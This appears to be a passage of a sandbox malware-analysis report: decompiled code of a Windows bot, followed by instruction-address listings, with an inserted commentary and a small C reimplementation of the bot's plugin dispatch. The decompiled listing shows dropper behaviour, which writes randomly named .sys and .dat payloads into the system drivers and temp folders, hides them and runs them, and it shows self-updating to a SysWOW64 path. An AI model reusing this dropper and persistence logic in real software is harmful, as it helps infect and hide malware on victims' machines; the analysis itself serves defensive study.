                                                                                                                                  														__eflags = _t705 - _v39;
                                                                                                                                  														if(_t705 == _v39) {
                                                                                                                                  															 *_t795(_v39,  *0x25236b0, _v52);
                                                                                                                                  															_t811 = _t811 + 0xc;
                                                                                                                                  															goto L165;
                                                                                                                                  														}
                                                                                                                                  														_t748 = _t748 + 1;
                                                                                                                                  														_t489 = _t489 + 4;
                                                                                                                                  														__eflags = _t748 - 0xa;
                                                                                                                                  														if(_t748 < 0xa) {
                                                                                                                                  															continue;
                                                                                                                                  														}
                                                                                                                                  														goto L165;
                                                                                                                                  													}
                                                                                                                                  													L165:
                                                                                                                                  													_t763 = _t763 + 4;
                                                                                                                                  													__eflags = _t763 - 0x80;
                                                                                                                                  												} while (_t763 < 0x80);
                                                                                                                                  												continue;
                                                                                                                                  											}
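The loop between labels L156 and L165 above is the bot's plugin dispatch. It walks a 0x80-byte table of pointers at 0x2523300 (32 slots), skips empty slots and entries with no function pointer at offset 0x40, scans up to ten command ids starting at offset 0xc of each entry, and calls the entry's function with (command, global context, argument) for every entry whose list contains the current command in _v39. A match ends the scan of that entry but not the walk, so more than one plugin can react to the same command. The C below is an added example written for this page, not code from the sample or from Joe Sandbox; it reimplements that routing with the same offsets and bounds so the behaviour can be checked on a constructed table. The names plugin_t, cmds, handler, dispatch_command, the recording handler and the table contents are assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>

/* Added example: readable rendering of the plugin dispatch loop in the
 * listing (labels L156..L165).  Names are assumptions; offsets are the
 * sample's: command ids at +0x0c, handler pointer at +0x40. */
#define PLUGIN_SLOTS    32      /* 0x80-byte table of 4-byte pointers */
#define PLUGIN_MAX_CMDS 10      /* inner loop stops at index 0xa */

typedef void (*plugin_handler_t)(uint32_t cmd, void *ctx, void *arg);

typedef struct plugin {
    uint8_t          hdr[0x0c];               /* unknown header bytes (assumed) */
    uint32_t         cmds[PLUGIN_MAX_CMDS];    /* +0x0c, zero-terminated list */
    uint8_t          pad[0x40 - 0x0c - 4 * PLUGIN_MAX_CMDS];
    plugin_handler_t handler;                  /* +0x40 */
} plugin_t;

_Static_assert(offsetof(plugin_t, cmds) == 0x0c, "cmds offset");
_Static_assert(offsetof(plugin_t, handler) == 0x40, "handler offset");

/* Walks the table in slot order and calls every plugin that lists cmd.
 * As in the sample, a match ends the scan of that plugin (goto L165) but
 * not the walk, so several plugins can claim one command.  Returns the
 * number of handlers invoked. */
int dispatch_command(plugin_t *table[], uint32_t cmd, void *ctx, void *arg)
{
    int fired = 0;
    for (int i = 0; i < PLUGIN_SLOTS; i++) {
        plugin_t *p = table[i];
        if (p == NULL || p->handler == NULL)
            continue;                           /* empty slot / no entry point */
        for (int j = 0; j < PLUGIN_MAX_CMDS; j++) {
            if (p->cmds[j] == 0)
                break;                          /* end of this plugin's list */
            if (p->cmds[j] == cmd) {
                p->handler(cmd, ctx, arg);      /* *_t795(_v39, *0x25236b0, _v52) */
                fired++;
                break;
            }
        }
    }
    return fired;
}

/* Constructed fixture, not from the sample: a handler that records the
 * command it received, in dispatch order. */
uint32_t g_calls[PLUGIN_SLOTS];
int      g_ncalls;

static void record_handler(uint32_t cmd, void *ctx, void *arg)
{
    (void)ctx; (void)arg;
    if (g_ncalls < PLUGIN_SLOTS)
        g_calls[g_ncalls++] = cmd;
}

static plugin_t g_plugin_a = { .cmds = { 2, 3 },    .handler = record_handler };
static plugin_t g_plugin_b = { .cmds = { 4 },       .handler = record_handler };
static plugin_t g_plugin_c = { .cmds = { 3, 0, 9 }, .handler = record_handler }; /* 9 is never reached: list ends at the 0 */
static plugin_t g_plugin_d = { .cmds = { 4 } };     /* handler NULL: slot is skipped */

/* Builds a sparse table like the one at 0x2523300 and dispatches one command. */
int demo_dispatch(uint32_t cmd)
{
    plugin_t *table[PLUGIN_SLOTS] = { 0 };
    table[1]  = &g_plugin_a;
    table[7]  = &g_plugin_b;
    table[20] = &g_plugin_c;
    table[31] = &g_plugin_d;
    g_ncalls = 0;
    return dispatch_command(table, cmd, NULL, NULL);
}
```

Two details of the sample's loop are worth keeping in mind when reading the listing: the command-id list is terminated by the first zero, so anything after a zero in those ten dwords is dead, and an entry with a zero at +0x40 is ignored even if it lists the command.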
__eflags = _t395 - 0xc;
if(_t395 <= 0xc) {
	_t796 =  *0x25236b0; // 0x4200000
	_t764 = 0;
	_v60 = 0;
	_v8 = _t796;
	__eflags =  *_t796;
	if( *_t796 <= 0) {
		L57:
		_t701 =  *0x25236b0; // 0x4200000
		_t93 = _t764 * 8; // 0x4200004
		_t797 =  &(_t701[_t93 + 4]);
		_t492 = _v52 + 4 + _t764 * 8;
		_t704 = _t797[0x124] + 0x128;
		_v8 = _t492;
		__eflags = _t797[0x124] + 0x128 - _t492;
		while(1) {
			_v12 = 0;
			if(__eflags > 0) {
				break;
			}
			__eflags = _v8;
			if(_v8 <= 0) {
				break;
			}
			__eflags =  *_t797 & 0x00000003;
			if(( *_t797 & 0x00000003) == 0) {
				L150:
				_t494 = _t797[0x124];
				_t704 = 0xfffffed8 - _t494;
				_v8 =  &(_v8[0xfffffffffffffed8]);
				_t797 =  &(_t797[_t494 + 0x128]);
				__eflags = _t797[0x124] + 0x128 - _v8;
				continue;
			} else {
				E0251EE2A(_t704,  &_v408, 0, 0x120);
				_t499 =  *_t797;
				_t811 = _t811 + 0xc;
				_t765 = 0;
				_t711 = 0x100;
				__eflags = _t499 & 0x00000f80;
				if((_t499 & 0x00000f80) == 0) {
					_t618 = _t499 | 0x00000100;
					__eflags = _t618;
					 *_t797 = _t618;
				}
				_t500 =  *_t797;
				__eflags = _t500 & 0x00000800;
				if((_t500 & 0x00000800) != 0) {
					_t616 = _t500 & 0xfffff7ff;
					 *_t797 = _t616;
					__eflags =  *0x252201e; // 0x0
					if(__eflags == 0) {
						_t617 = _t616 | 0x00000200;
						__eflags = _t617;
					} else {
						_t617 = _t616 | _t711;
					}
					 *_t797 = _t617;
				}
				_t501 =  *_t797;
				__eflags = _t501;
				if(_t501 >= 0) {
					__eflags = _t711 & _t501;
					if((_t711 & _t501) == 0) {
						__eflags = _t501 & 0x00000200;
						if((_t501 & 0x00000200) == 0) {
							__eflags = _t501 & 0x00000400;
							if((_t501 & 0x00000400) == 0) {
								goto L96;
							}
							GetSystemDirectoryA( &_v408, 0x100);
							_t595 =  &_v408;
							_t775 = _t595 + 1;
							do {
								_t723 =  *_t595;
								_t595 = _t595 + 1;
								__eflags = _t723;
							} while (_t723 != 0);
							_t596 = _t595 - _t775;
							__eflags = _t596;
							if(_t596 != 0) {
								__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
								if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
									 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
								}
							}
							E0251EF1E( &_v408, "drivers\\");
							_t776 =  &_v408;
							_t141 = _t776 + 1; // 0x5d
							_t711 = _t141;
                                                                                                                                  																		do {
                                                                                                                                  																			_t599 =  *_t776;
                                                                                                                                  																			_t776 = _t776 + 1;
                                                                                                                                  																			__eflags = _t599;
                                                                                                                                  																		} while (_t599 != 0);
                                                                                                                                  																		_t765 = _t776 - _t711;
                                                                                                                                  																		__eflags = _t765;
                                                                                                                                  																		goto L96;
                                                                                                                                  																	}
                                                                                                                                  																	GetSystemDirectoryA( &_v408, 0x100);
                                                                                                                                  																	_t777 =  &_v408;
                                                                                                                                  																	_t602 = _t777 + 1;
                                                                                                                                  																	do {
                                                                                                                                  																		_t711 =  *_t777;
                                                                                                                                  																		_t777 = _t777 + 1;
                                                                                                                                  																		__eflags = _t711;
                                                                                                                                  																	} while (_t711 != 0);
                                                                                                                                  																	_t765 = _t777 - _t602;
                                                                                                                                  																	__eflags = _t765;
                                                                                                                                  																	goto L83;
                                                                                                                                  																} else {
                                                                                                                                  																	GetEnvironmentVariableA(E02512544(0x25222f8, 0x2520a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                                                                                                                  																	E0251EE2A(_t711, 0x25222f8, 0, 0x100);
                                                                                                                                  																	_t607 =  &_v408;
                                                                                                                                  																	_t811 = _t811 + 0x20;
                                                                                                                                  																	_t779 = _t607 + 1;
                                                                                                                                  																	goto L77;
                                                                                                                                  																	L83:
                                                                                                                                  																	__eflags = _t765;
                                                                                                                                  																	if(_t765 == 0) {
                                                                                                                                  																		goto L96;
                                                                                                                                  																	}
                                                                                                                                  																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
                                                                                                                                  																	goto L85;
                                                                                                                                  																	L77:
                                                                                                                                  																	_t711 =  *_t607;
                                                                                                                                  																	_t607 = _t607 + 1;
                                                                                                                                  																	__eflags = _t711;
                                                                                                                                  																	if(_t711 != 0) {
                                                                                                                                  																		goto L77;
                                                                                                                                  																	} else {
                                                                                                                                  																		_t765 = _t607 - _t779;
                                                                                                                                  																		goto L83;
                                                                                                                                  																	}
                                                                                                                                  																}
                                                                                                                                  															} else {
                                                                                                                                  																_t109 =  &(_t797[4]); // 0x4200008
                                                                                                                                  																_t780 = _t109;
                                                                                                                                  																_t609 = _t109;
                                                                                                                                  																_t110 =  &(_t609[1]); // 0x4200009
                                                                                                                                  																_t726 = _t110;
                                                                                                                                  																goto L69;
                                                                                                                                  																do {
                                                                                                                                  																	L71:
                                                                                                                                  																	_t711 =  *_t613;
                                                                                                                                  																	_t613 = _t613 + 1;
                                                                                                                                  																	__eflags = _t711;
                                                                                                                                  																} while (_t711 != 0);
                                                                                                                                  																_t765 = _t613 - _t781;
                                                                                                                                  																__eflags = _t765;
                                                                                                                                  																if(_t765 == 0) {
                                                                                                                                  																	L96:
                                                                                                                                  																	__eflags =  *_t797 & 0x00000004;
                                                                                                                                  																	if(( *_t797 & 0x00000004) == 0) {
                                                                                                                                  																		_t165 =  &(_t797[0x104]); // 0x4200108
                                                                                                                                  																		_t502 = _t165;
                                                                                                                                  																		L106:
                                                                                                                                  																		_push(_t502);
                                                                                                                                  																		L107:
                                                                                                                                  																		lstrcatA( &_v408, ??);
                                                                                                                                  																		L108:
                                                                                                                                  																		__eflags =  *_t797 & 0x00000040;
                                                                                                                                  																		if(( *_t797 & 0x00000040) != 0) {
                                                                                                                                  																			E02518E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
                                                                                                                                  																			_t811 = _t811 + 0x18;
                                                                                                                                  																		}
                                                                                                                                  																		__eflags = _v39 - 0xc;
                                                                                                                                  																		if(_v39 == 0xc) {
                                                                                                                                  																			_t583 = E0251EE95( &_v408, ".dat");
                                                                                                                                  																			_pop(_t711);
                                                                                                                                  																			__eflags = _t583;
                                                                                                                                  																			if(_t583 != 0) {
                                                                                                                                  																				SetFileAttributesA( &_v408, 0x80);
                                                                                                                                  																			}
                                                                                                                                  																		}
                                                                                                                                  																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                                                                  																		__eflags = _t766 - 0xffffffff;
                                                                                                                                  																		if(_t766 == 0xffffffff) {
                                                                                                                                  																			E0251EE2A(_t711,  &_v408, 0, 0x120);
                                                                                                                                  																			GetEnvironmentVariableA(E02512544(0x25222f8, 0x2520a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                                                                                                                  																			E0251EE2A(_t711, 0x25222f8, 0, 0x100);
                                                                                                                                  																			_t513 =  &_v408;
                                                                                                                                  																			_t811 = _t811 + 0x2c;
                                                                                                                                  																			_t768 = _t513 + 1;
                                                                                                                                  																			do {
                                                                                                                                  																				_t712 =  *_t513;
                                                                                                                                  																				_t513 = _t513 + 1;
                                                                                                                                  																				__eflags = _t712;
                                                                                                                                  																			} while (_t712 != 0);
                                                                                                                                  																			_t514 = _t513 - _t768;
                                                                                                                                  																			__eflags = _t514;
                                                                                                                                  																			if(_t514 != 0) {
                                                                                                                                  																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
                                                                                                                                  																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
                                                                                                                                  																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
                                                                                                                                  																				}
                                                                                                                                  																			}
                                                                                                                                  																			_t210 =  &(_t797[0x104]); // 0x4200108
                                                                                                                                  																			lstrcatA( &_v408, _t210);
                                                                                                                                  																			__eflags = _v39 - 0xc;
                                                                                                                                  																			if(_v39 == 0xc) {
                                                                                                                                  																				_t545 = E0251EE95( &_v408, ".dat");
                                                                                                                                  																				_pop(_t712);
                                                                                                                                  																				__eflags = _t545;
                                                                                                                                  																				if(_t545 != 0) {
                                                                                                                                  																					SetFileAttributesA( &_v408, 0x80);
                                                                                                                                  																				}
                                                                                                                                  																			}
                                                                                                                                  																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                                                                  																			__eflags = _t769 - 0xffffffff;
                                                                                                                                  																			if(_t769 != 0xffffffff) {
                                                                                                                                  																				_t218 =  &(_t797[0x128]); // 0x420012c
                                                                                                                                  																				WriteFile(_t769, _t218, _t797[0x124],  &_v56, 0);
                                                                                                                                  																				CloseHandle(_t769);
                                                                                                                                  																				__eflags = _v39 - 0xc;
                                                                                                                                  																				if(_v39 == 0xc) {
                                                                                                                                  																					_t541 = E0251EE95( &_v408, ".dat");
                                                                                                                                  																					_pop(_t712);
                                                                                                                                  																					__eflags = _t541;
                                                                                                                                  																					if(_t541 != 0) {
                                                                                                                                  																						SetFileAttributesA( &_v408, 2);
                                                                                                                                  																					}
                                                                                                                                  																				}
                                                                                                                                  																				_v12 = 1;
                                                                                                                                  																			}
                                                                                                                                  																			goto L143;
                                                                                                                                  																		} else {
                                                                                                                                  																			_t176 =  &(_t797[0x128]); // 0x420012c
                                                                                                                                  																			WriteFile(_t766, _t176, _t797[0x124],  &_v56, 0);
                                                                                                                                  																			CloseHandle(_t766);
                                                                                                                                  																			__eflags = _v39 - 0xc;
                                                                                                                                  																			if(_v39 == 0xc) {
                                                                                                                                  																				_t579 = E0251EE95( &_v408, ".dat");
                                                                                                                                  																				__eflags = _t579;
                                                                                                                                  																				if(_t579 != 0) {
                                                                                                                                  																					SetFileAttributesA( &_v408, 2);
                                                                                                                                  																				}
                                                                                                                                  																			}
                                                                                                                                  																			_v12 = 1;
                                                                                                                                  																			_t552 = E0251EE95( &_v408, ".dat");
                                                                                                                                  																			_pop(_t712);
                                                                                                                                  																			__eflags = _t552;
                                                                                                                                  																			if(_t552 == 0) {
                                                                                                                                  																				L143:
                                                                                                                                  																				__eflags =  *_t797 & 0x00000040;
                                                                                                                                  																				if(( *_t797 & 0x00000040) != 0) {
                                                                                                                                  																					E02518E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
                                                                                                                                  																					_t811 = _t811 + 0x18;
                                                                                                                                  																				}
                                                                                                                                  																				__eflags =  *_t797 & 0x00000002;
                                                                                                                                  																				if(( *_t797 & 0x00000002) != 0) {
                                                                                                                                  																					__eflags = _v12;
                                                                                                                                  																					if(__eflags != 0) {
                                                                                                                                  																						E02517EAD(_t748, __eflags, 1);
											E02517FCF(_t712);
											_t770 = 0x44;
											E0251EE2A(_t712,  &_v876, 0, _t770);
											_t811 = _t811 + 0x10;
											_v876.cb = _t770;
											_t527 = CreateProcessA( &_v408, 0x2520264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
											__eflags = _t527;
											if(_t527 == 0) {
												E02517EE6(_t712);
												E02517EAD(_t748, __eflags, 0);
												DeleteFileA( &_v408);
											} else {
												CloseHandle(_v424.hThread);
												CloseHandle(_v424);
											}
										}
									}
									goto L150;
								} else {
									E0251EE2A(_t712,  &_v408, 0, 0x120);
									GetEnvironmentVariableA(E02512544(0x25222f8, 0x2520a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
									E0251EE2A(_t712, 0x25222f8, 0, 0x100);
									_t559 =  &_v408;
									_t811 = _t811 + 0x2c;
									_t773 = _t559 + 1;
									do {
										_t712 =  *_t559;
										_t559 = _t559 + 1;
										__eflags = _t712;
									} while (_t712 != 0);
									_t560 = _t559 - _t773;
									__eflags = _t560;
									if(_t560 != 0) {
										__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
										if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
											 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
										}
									}
									_t190 =  &(_t797[0x104]); // 0x4200108
									lstrcatA( &_v408, _t190);
									__eflags = _v39 - 0xc;
									if(_v39 == 0xc) {
										_t575 = E0251EE95( &_v408, ".dat");
										_pop(_t712);
										__eflags = _t575;
										if(_t575 != 0) {
											SetFileAttributesA( &_v408, 0x80);
										}
									}
									_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
									__eflags = _t774 - 0xffffffff;
									if(_t774 != 0xffffffff) {
										_t198 =  &(_t797[0x128]); // 0x420012c
										WriteFile(_t774, _t198, _t797[0x124],  &_v56, 0);
										CloseHandle(_t774);
										__eflags = _v39 - 0xc;
										if(_v39 == 0xc) {
											_t571 = E0251EE95( &_v408, ".dat");
											_pop(_t712);
											__eflags = _t571;
											if(_t571 != 0) {
												SetFileAttributesA( &_v408, 2);
											}
										}
									}
									goto L143;
								}
							}
						}
						_t588 = E0251ECA5();
						_t711 = 5;
						_t748 = _t588 % _t711 + 3;
						__eflags = _t748;
						_v17 = _t748;
						if(_t748 == 0) {
							L99:
							 *(_t806 + _t765 - 0x194) = 0;
							_t590 =  *_t797;
							__eflags = _t590 & 0x0000000a;
							if((_t590 & 0x0000000a) != 0) {
								_t502 = E02512544(0x25222f8, 0x2520694, 5, 0xe4, 0xc8);
								_t811 = _t811 + 0x14;
								goto L106;
							}
							__eflags = _t590 & 0x00000010;
							if((_t590 & 0x00000010) == 0) {
								__eflags = _t590 & 0x00000020;
								if((_t590 & 0x00000020) == 0) {
									goto L108;
								}
								_push(".dat");
								goto L107;
							}
							_push(".sys");
							goto L107;
						} else {
							goto L98;
						}
						do {
							L98:
							_t591 = E0251ECA5();
							_t711 = 0x19;
							_t748 = _t591 % _t711 + 0x61;
							 *(_t806 + _t765 - 0x194) = _t748;
							_t765 = _t765 + 1;
							_t155 =  &_v17;
							 *_t155 = _v17 - 1;
							__eflags =  *_t155;
						} while ( *_t155 != 0);
						goto L99;
					}
					_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
					__eflags = _t615 - 0x5c;
					if(_t615 != 0x5c) {
						__eflags = _t615 - 0x2f;
						L85:
						if(__eflags != 0) {
							 *(_t806 + _t765 - 0x194) = 0x5c;
							_t765 = _t765 + 1;
						}
					}
					goto L96;
					L69:
					_t748 =  *_t609;
					_t609 =  &(_t609[1]);
					__eflags = _t748;
					if(_t748 != 0) {
						goto L69;
					} else {
						__eflags = _t609 - _t726;
						E0251EE08( &_v408, _t780, _t609 - _t726);
						_t613 =  &_v408;
						_t811 = _t811 + 0xc;
						_t781 = _t613 + 1;
						goto L71;
					}
				}
			}
		}
		__eflags =  *0x252211c & 0x00000004;
		if(( *0x252211c & 0x00000004) == 0) {
			continue;
		}
		__eflags = _v60;
		if(_v60 == 0) {
			continue;
		}
		__eflags =  *0x252201d; // 0x0
		if(__eflags == 0) {
			continue;
		}
		__imp__#3(_v16);
		Sleep(0x3e8);
		E0251E318();
		ExitProcess(0);
	} else {
		_t798 =  &(_t796[8]);
		__eflags = _t798;
		do {
			_t621 =  *(_t798 - 4);
			__eflags = _t621;
			if(_t621 == 0) {
				_v60 = 1;
				 *0x2522138 =  *_t798;
			} else {
				_t624 = _t621 - 1;
				__eflags = _t624;
				if(_t624 == 0) {
					E0251EA84(1, "localcfg", "lid_file_upd",  *_t798);
					_t811 = _t811 + 0x10;
					 *0x252213c =  *_t798;
				} else {
					__eflags = _t624 == 1;
					if(_t624 == 1) {
						E0251EA84(1, "localcfg", "flags_upd",  *_t798);
						_t811 = _t811 + 0x10;
						 *0x252211c =  *0x252211c |  *_t798;
					}
				}
			}
			_t764 = _t764 + 1;
			_t798 =  &(_t798[2]);
			__eflags = _t764 -  *_v8;
		} while (_t764 <  *_v8);
		goto L57;
	}
}
__eflags = _t395 - 0x1b;
if(_t395 != 0x1b) {
	goto L156;
}
__eflags = _v52 - 0xc;
if(_v52 <= 0xc) {
	_t630 =  *0x25236b0; // 0x4200000
	 *0x25221a4 = _t630[4];
	 *0x25222d4 = _t630[8];
	_t632 = E0251F04E(0);
	asm("adc edx, ebx");
	 *0x25236a8 = _t632 + 0xe10;
	 *0x25236ac = _t748;
	continue;
}
_t634 = E02517E2F(_t748);
__eflags = _t634;
if(_t634 != 0) {
	continue;
}
_t635 =  *0x25236b0; // 0x4200000
_v12 = _t635;
__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
if(__eflags == 0) {
	L45:
	_t636 = _v12;
	 *0x25221a4 =  *(_t636 + 4);
	 *0x25222d4 =  *(_t636 + 8);
	E02517EAD(_t748, __eflags, 0);
	goto L46;
} else {
	GetTempPathA(0x120,  &_v408);
                                                                                                                                  												_t642 = E02518274( &_v408);
                                                                                                                                  												_pop(_t709);
                                                                                                                                  												_t782 = _t642;
                                                                                                                                  												_t801 = (E0251ECA5() & 0x00000003) + 5;
                                                                                                                                  												goto L38;
                                                                                                                                  												L38:
                                                                                                                                  												__eflags = _t801;
                                                                                                                                  												if(_t801 > 0) {
                                                                                                                                  													_t644 = E0251ECA5();
                                                                                                                                  													_t709 = 0x1a;
                                                                                                                                  													_t748 = _t644 % _t709 + 0x61;
                                                                                                                                  													 *(_t806 + _t782 - 0x194) = _t748;
                                                                                                                                  													_t782 = _t782 + 1;
                                                                                                                                  													_t801 = _t801 - 1;
                                                                                                                                  													__eflags = _t801;
                                                                                                                                  													goto L38;
                                                                                                                                  												} else {
                                                                                                                                  													E0251EF00(_t806 + _t782 - 0x194, E02512544(0x25222f8, 0x2520694, 5, 0xe4, 0xc8));
                                                                                                                                  													E0251EE2A(_t709, 0x25222f8, 0, 0x100);
                                                                                                                                  													_t811 = _t811 + 0x28;
                                                                                                                                  													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                  													_v8 = _t651;
                                                                                                                                  													__eflags = _t651 - 0xffffffff;
                                                                                                                                  													if(__eflags != 0) {
                                                                                                                                  														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
                                                                                                                                  														_push(_v8);
                                                                                                                                  														__eflags = _t657;
                                                                                                                                  														if(__eflags == 0) {
                                                                                                                                  															CloseHandle();
                                                                                                                                  														} else {
                                                                                                                                  															CloseHandle();
                                                                                                                                  															_push("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe");
                                                                                                                                  															_push( &_v408);
                                                                                                                                  															wsprintfA( &_v1176, E02512544(0x25222f8, 0x2520fe4, 0xc, 0xe4, 0xc8));
                                                                                                                                  															E0251EE2A(_t709, 0x25222f8, 0, 0x100);
                                                                                                                                  															_t803 = 0x44;
                                                                                                                                  															E0251EE2A(_t709,  &_v808, 0, 0x25222f8);
                                                                                                                                  															_v808.cb = _t803;
                                                                                                                                  															E0251EE2A(_t709,  &_v120, 0, 0x10);
                                                                                                                                  															_t811 = _t811 + 0x48;
                                                                                                                                  															E02517FCF(_t709);
                                                                                                                                  															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
                                                                                                                                  															__eflags = _t673;
                                                                                                                                  															if(_t673 != 0) {
                                                                                                                                  																WaitForSingleObject(_v120.hProcess, 0xea60);
                                                                                                                                  																CloseHandle(_v120.hThread);
                                                                                                                                  																CloseHandle(_v120);
                                                                                                                                  																_t681 = E0251F04E(0) + 0xe10;
                                                                                                                                  																__eflags = _t681;
                                                                                                                                  																asm("adc edx, ebx");
                                                                                                                                  																_pop(_t709);
                                                                                                                                  																 *0x25236a8 = _t681;
                                                                                                                                  																 *0x25236ac = _t748;
                                                                                                                                  															}
                                                                                                                                  															E02517EE6(_t709);
                                                                                                                                  															DeleteFileA( &_v408);
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  													goto L45;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										L228:
                                                                                                                                  										__imp__#3(_v16);
                                                                                                                                  										E0251E318();
                                                                                                                                  										return _v68;
                                                                                                                                  									} else {
                                                                                                                                  										__imp__#3(_v16);
                                                                                                                                  										goto L21;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								L15:
                                                                                                                                  								__imp__#3(_v16); // executed
                                                                                                                                  							}
                                                                                                                                  							return E0251C8AA(_t829);
                                                                                                                                  						} else {
                                                                                                                                  							_t805 =  *0x2523670; // 0x2
                                                                                                                                  							while(_v12 < _t805) {
                                                                                                                                  								_t7 = _t747 + 1; // 0x1
                                                                                                                                  								asm("cdq");
                                                                                                                                  								_t747 = _t7 % _t805;
                                                                                                                                  								 *0x252367c =  *0x252367c + 1;
                                                                                                                                  								_v12 = _v12 + 1;
                                                                                                                                  								 *0x2523674 = _t747;
                                                                                                                                  								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								goto L11;
                                                                                                                                  							}
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t686 = E0251EBCC(0x100000);
                                                                                                                                  					 *0x25236b0 = _t686;
                                                                                                                                  					if(_t686 == 0) {
                                                                                                                                  						goto L21;
                                                                                                                                  					}
                                                                                                                                  					goto L7;
                                                                                                                                  				}
                                                                                                                                  				_t820 =  *0x2523670; // 0x2
                                                                                                                                  				if(_t820 != 0) {
                                                                                                                                  					goto L3;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}

                                                                                                                                  0x0251db02
                                                                                                                                  0x0251db0b
                                                                                                                                  0x0251db1b
                                                                                                                                  0x0251db20
                                                                                                                                  0x0251db20
                                                                                                                                  0x0251db02
                                                                                                                                  0x0251dafd
                                                                                                                                  0x0251db23
                                                                                                                                  0x0251db24
                                                                                                                                  0x0251db24
                                                                                                                                  0x00000000
                                                                                                                                  0x0251db29
                                                                                                                                  0x0251cbbe
                                                                                                                                  0x0251cbc1
                                                                                                                                  0x0251d662
                                                                                                                                  0x0251d667
                                                                                                                                  0x0251d669
                                                                                                                                  0x0251d66c
                                                                                                                                  0x0251d66f
                                                                                                                                  0x0251d672
                                                                                                                                  0x0251d675
                                                                                                                                  0x0251d6c7
                                                                                                                                  0x0251d6c7
                                                                                                                                  0x0251d6cb
                                                                                                                                  0x0251d707
                                                                                                                                  0x0251d707
                                                                                                                                  0x0251d70b
                                                                                                                                  0x0251d754
                                                                                                                                  0x0251d754
                                                                                                                                  0x0251d758
                                                                                                                                  0x0251d79e
                                                                                                                                  0x0251d79e
                                                                                                                                  0x0251d7a2
                                                                                                                                  0x0251d8b3
                                                                                                                                  0x0251d8b3
                                                                                                                                  0x0251d8ba
                                                                                                                                  0x0251d93a
                                                                                                                                  0x0251d93a
                                                                                                                                  0x0251d941
                                                                                                                                  0x0251da0e
                                                                                                                                  0x0251da0e
                                                                                                                                  0x0251da11
                                                                                                                                  0x0251da11
                                                                                                                                  0x0251da14
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da1d
                                                                                                                                  0x0251da23
                                                                                                                                  0x0251da25
                                                                                                                                  0x0251da90
                                                                                                                                  0x0251da90
                                                                                                                                  0x0251da94
                                                                                                                                  0x0251da9b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251daa1
                                                                                                                                  0x0251daa4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251dabf
                                                                                                                                  0x0251dac2
                                                                                                                                  0x0251dac7
                                                                                                                                  0x0251daca
                                                                                                                                  0x0251dacc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251dacc
                                                                                                                                  0x0251da27
                                                                                                                                  0x0251da2a
                                                                                                                                  0x0251da2c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da42
                                                                                                                                  0x0251da7d
                                                                                                                                  0x0251da7d
                                                                                                                                  0x0251da80
                                                                                                                                  0x0251da83
                                                                                                                                  0x0251da85
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da5f
                                                                                                                                  0x0251da64
                                                                                                                                  0x0251da67
                                                                                                                                  0x0251da69
                                                                                                                                  0x0251da89
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da89
                                                                                                                                  0x0251da7a
                                                                                                                                  0x0251da7a
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da87
                                                                                                                                  0x00000000
                                                                                                                                  0x0251da11
                                                                                                                                  0x0251d947
                                                                                                                                  0x0251d94c
                                                                                                                                  0x0251d94e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d955
                                                                                                                                  0x0251d95b
                                                                                                                                  0x0251d961
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d967
                                                                                                                                  0x0251d975
                                                                                                                                  0x0251d975
                                                                                                                                  0x0251d97b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d981
                                                                                                                                  0x0251d987
                                                                                                                                  0x0251d9c9
                                                                                                                                  0x0251d9c9
                                                                                                                                  0x0251d9ce
                                                                                                                                  0x0251d9d0
                                                                                                                                  0x0251d9d6
                                                                                                                                  0x0251d9d9
                                                                                                                                  0x0251d9df
                                                                                                                                  0x0251d9f7
                                                                                                                                  0x0251d9fe
